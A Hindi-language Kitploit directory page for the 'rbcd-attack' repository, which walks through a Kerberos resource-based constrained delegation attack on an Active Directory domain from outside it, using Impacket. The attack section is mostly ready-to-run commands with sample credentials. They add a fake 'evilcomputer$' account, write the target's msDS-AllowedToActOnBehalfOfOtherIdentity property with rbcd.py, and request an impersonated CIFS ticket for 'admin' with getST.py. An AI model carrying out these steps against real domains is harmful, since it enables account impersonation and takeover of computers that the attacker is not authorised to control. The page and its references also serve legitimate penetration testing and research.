Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
rbcd-attack — बाहर से Impacket का उपयोग करके Kerberos Resource-Based Constrained Delegation Attack | Kitploit
उपकरण/GitHubGitHub/tothi/rbcd-attack
विशेषाधिकार वृद्धिशोषणपेनिट्रेशन टेस्टिंग
GitHubtothi/rbcd-attack

rbcd-attack

बाहर से Impacket का उपयोग करके Kerberos Resource-Based Constrained Delegation Attack

रिपॉजिटरी देखें
646721 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

केर्बेरोस रिसोर्स-बेस्ड कंस्ट्रेंड डेलिगेशन का दुरुपयोग

संक्षेप

यह रिपॉजिटरी विंडोज एक्टिव डायरेक्टरी डोमेन में केर्बेरोस रिसोर्स-बेस्ड कंस्ट्रेंड डेलिगेशन के खिलाफ एक व्यावहारिक हमले के बारे में है।

अन्य सामान्य कार्यान्वयनों से अंतर यह है कि हम हमले को विंडोज डोमेन के बाहर से लॉन्च कर रहे हैं, न कि डोमेन से जुड़े (आमतौर पर विंडोज) कंप्यूटर से।

हमला केवल Python3 Impacket (और इसकी निर्भरताओं) का उपयोग करके कार्यान्वित किया गया है। Arch पर अप-टू-डेट Impacket (लेखन के समय 0.9.21) के साथ परीक्षण किया गया।

Attack Log

हमला

संक्षेप में, बिना किसी गहरे विवरण के, हमला एक डोमेन कंप्यूटर को लक्ष्य करता है, विशेष रूप से लक्ष्य डोमेन कंप्यूटर से संबंधित सेवा प्रिंसिपलों को।

यहां हमें पूर्वापेक्षा के रूप में क्या चाहिए:

  • एक डोमेन खाता जिसमें लक्ष्य कंप्यूटर तक लेखन पहुंच हो (विशेष रूप से लक्ष्य कंप्यूटर डोमेन ऑब्जेक्ट की msDS-AllowedToActOnBehalfOfOtherIdentity प्रॉपर्टी तक लेखन पहुंच)
  • नए कंप्यूटर खाते बनाने की अनुमति (यह आमतौर पर डिफ़ॉल्ट है, MachineAccountQuota देखें)
  • DC तक LDAP (389/tcp) और SAMR (445/tcp) (या LDAPS (636/tcp)) पहुंच
  • DC तक Kerberos (88/tcp) पहुंच

हमले का मार्ग बहुत उच्च स्तर पर:

  1. एक नकली कंप्यूटर बनाएं
  2. लक्ष्य की msDS-AllowedToActOnBehalfOfOtherIdentity प्रॉपर्टी का दुरुपयोग करें
  3. लक्ष्य कंप्यूटर के लिए प्रतिरूपित सेवा टिकट (S4U) का अनुरोध करें

लाभ:

  • प्रतिरूपित सेवा टिकट लक्ष्य पर CIFS, HTTP आदि जैसी सेवाओं तक उच्च-स्तरीय पहुंच की अनुमति दे सकते हैं, यदि प्रतिरूपित खाते के पास विशेषाधिकार हों। कभी-कभी कंप्यूटर का अधिग्रहण।

सामान्य टूलसेट

इस हमले के लिए सामान्य टूलसेट एक डोमेन-जॉइन विंडोज कंप्यूटर पर काम करते हैं, जो उपयोग करते हैं:

  • Powermad नए कंप्यूटर खाते जोड़ने के लिए
  • Powerview from PowerSploit dev branch msDS-AllowedToActOnBehalfOfOtherIdentity के दुरुपयोग के लिए
  • Rubeus S4U टिकट संचालन के लिए

इम्पैकेट कार्यान्वयन

यह कार्यान्वयन डोमेन के बाहर से शुद्ध Impacket का उपयोग करता है।

नकली कंप्यूटर बनाना

Impacket से addcomputer.py उदाहरण का उपयोग करके एक नकली कंप्यूटर (evilcomputer नाम का) बनाते हैं:

root@kitploit:~
addcomputer.py -computer-name 'evilcomputer$' -computer-pass ev1lP@sS -dc-ip 192.168.33.203 ecorp.local/test:ohW9Lie0

प्रतिनिधिमंडल अधिकारों को संशोधित करना

रीपो में यहां पाए जाने वाली स्क्रिप्ट rbcd.py को लागू किया गया है जो नवनिर्मित EVILCOMPUTER के संबंधित सुरक्षा डिस्क्रिप्टर को लक्ष्य कंप्यूटर की msDS-AllowedToActOnBehalfOfOtherIdentity प्रॉपर्टी में जोड़ता है।

root@kitploit:~
./rbcd.py -f EVILCOMPUTER -t WEB -dc-ip 192.168.33.203 ecorp\\test:ohW9Lie0

स्क्रिप्ट ntlmrelayx.py इम्पैकेट उदाहरण में Python कक्षाओं का भारी उपयोग करती है। सहायता और उदाहरण के लिए बिना विकल्पों के स्क्रिप्ट को कॉल करें।

प्रतिरूपित सेवा टिकट प्राप्त करना

अब S4U2Self क्वेरी द्वारा कंस्ट्रेंड डेलिगेशन का दुरुपयोग करने और लक्ष्य कंप्यूटर के लिए एक प्रतिरूपित सेवा टिकट प्राप्त करने के लिए सब कुछ तैयार है। getST.py इम्पैकेट उदाहरण स्क्रिप्ट के साथ:

root@kitploit:~
getST.py -spn cifs/WEB.ecorp.local -impersonate admin -dc-ip 192.168.33.203 ecorp.local/EVILCOMPUTER$:ev1lP@sS

उपरोक्त कमांड लक्षित डोमेन उपयोगकर्ता admin की ओर से एक CIFS सेवा टिकट प्राप्त करता है और इसे फ़ाइल admin.ccache में संग्रहीत करता है।

फ़ाइल पथ को KRB5CCNAME वेरिएबल में जोड़ने के बाद टिकट Kerberos क्लाइंट के लिए उपयोग योग्य होता है।

root@kitploit:~
export KRB5CCNAME=`pwd`/admin.ccache
klist

संदर्भ

संसाधन-आधारित प्रतिबंधित प्रतिनिधिमंडल के दुरुपयोग के विवरण के लिए:

  • https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
  • https://www.harmj0y.net/blog/activedirectory/a-case-study-in-wagging-the-dog-computer-takeover/
  • http://www.harmj0y.net/blog/activedirectory/s4u2pwnage/

और केर्बेरोस हमलों के बारे में सबसे व्यापक प्रस्तुतियों में से एक:

  • Constructing Kerberos Attacks with Delegation Primitives slides at Defcon by Elad Shamir and Matt Bush
टूल डाउनलोड करें